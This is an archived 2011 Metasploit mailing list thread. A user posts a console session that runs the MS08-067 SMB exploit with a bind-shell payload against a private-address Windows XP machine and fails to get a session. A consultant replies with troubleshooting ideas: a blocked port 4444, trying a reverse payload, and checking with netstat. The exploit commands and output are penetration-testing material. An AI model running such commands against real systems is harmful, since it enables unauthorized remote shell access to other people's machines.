Metasploit mailing list archives
Re: ASK: Exploit completed, but no session was created
From: Jose Selvi <jselvi () pentester es>
Date: Sat, 12 Mar 2011 20:52:56 +0100
Target isn't vulnerable or you can't establish a connection. Maybe the XP firewall is blocking incoming connections to 4444/tcp. Why don't you try to use another payload? a reverse one.If it's a test machine you can also try to look if there ir any listening process at 4444/tcp with netstat. If not, probably target isn't vulnerable.
Good luck. Regards. El 12/03/11 15:21, Dodi Ara escribió:
msf> use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi)> set payload windows/shell_bind_tcp payload => windows/shell_bind_tcp msf exploit(ms08_067_netapi)> set RHOST 192.168.1.1 RHOST => 192.168.1.11 msf exploit(ms08_067_netapi)> show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.1.11 yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) Payload options (windows/shell_bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, none, process LPORT 4444 yes The listen port RHOST 192.168.1.11 no The target address Exploit target: Id Name -- ---- 0 Automatic Targeting msf exploit(ms08_067_netapi)> exploit [*] Started bind handler [*] Automatically detecting the target... [*] Fingerprint: Windows XP - Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Attempting to trigger the vulnerability... [*] Exploit completed, but no session was created. msf exploit(ms08_067_netapi)> ------------------------- why metasploit doesn't succesfuly? _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
-- Jose Selvi. Security Technical Consultant CISA, CISSP, CNAP, GCIH, GPEN http://www.pentester.es SANS Mentor in Madrid (Spain). September 23 - November 25 SEC560: Network Penetration Testing and Ethical Hacking http://www.sans.org/mentor/details.php?nid=24133 http://www.pentester.es/2010/12/nuevo-grupo-y-descuento-para-network.html _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- ASK: Exploit completed, but no session was created Dodi Ara (Mar 12)
- Re: ASK: Exploit completed, but no session was created Sumit Sharma (Mar 12)
- Re: ASK: Exploit completed, but no session was created Jose Selvi (Mar 12)